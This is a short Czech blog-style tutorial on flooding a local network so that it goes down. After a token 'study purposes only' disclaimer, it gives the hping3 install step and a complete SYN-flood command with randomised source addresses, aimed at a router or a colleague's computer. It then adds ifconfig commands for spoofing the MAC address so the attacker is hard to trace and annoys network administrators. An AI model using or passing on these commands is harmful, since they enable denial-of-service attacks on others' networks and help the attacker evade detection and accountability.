DDoS jednoduše, aneb jak shodit síť jednoduchým příkazem


Předem Vás všechny upozorním, že se jedná o příklad, sloužící pouze k studijním účelů a jeho zneužíváním se můžete dopouštět trestné činnosti.


Teď už se podíváme na to jak jednoduché to celé je a co k tomu budeme potřebovat.

Nevyhnete se stroji s linuxem, je v podstatě jedno jakou distribuci si vyberete, žádný Kali Linux není třeba, vystačíte si například s uživatelsky velmi příjemnou verzí Linux Mint. Pro začátečníky mohu určitě doporučit, grafické prostředí je velmi podobné windows. 
Pokud již máme stroj na kterém na běží některá s distribucí linuxu stačí pouze spustit terminál a stáhnout program hping3: sudo apt install hping3

Když máme nainstalováno můžeme začít se samotným útokem. Nejlépe útočit přímo na router, ale z vlastní zkušenosti vím, že je v podstatě jedno na který stroj v síti budete utočit, síť se totiž sesype celá a to i když útočíte na PC vašeho kolegy.

Do terminálu tedy zadáme příkaz: sudo hping -c 10000 -d 120 -S -w 64 -p 21 –flood –rand-source 192.168.x.x poté již stačí něj zmáčknout ENTER a koukat jak všem popadá síť.

Pokud tento typ útoku provedete s NTB se změněnou MAC adresou velmi těžko se bude Váš útočící stroj dohledávat a potrápíte takto nejednoho správce sítě.

Změna MAC adresy je jednoduchá:

sudo ifconfig eth0 down
sudo ifconfig hw ether 12:00:16:b8:39:95
sudo ifconfig eth0 up

Změnu MAC adresy doporučuji provést vždy, jste pak pro útočníka hůře identifikovatelní.


 

Hodnocení
Datum hodnocení
Hodnocení autora
51star1star1star1star1star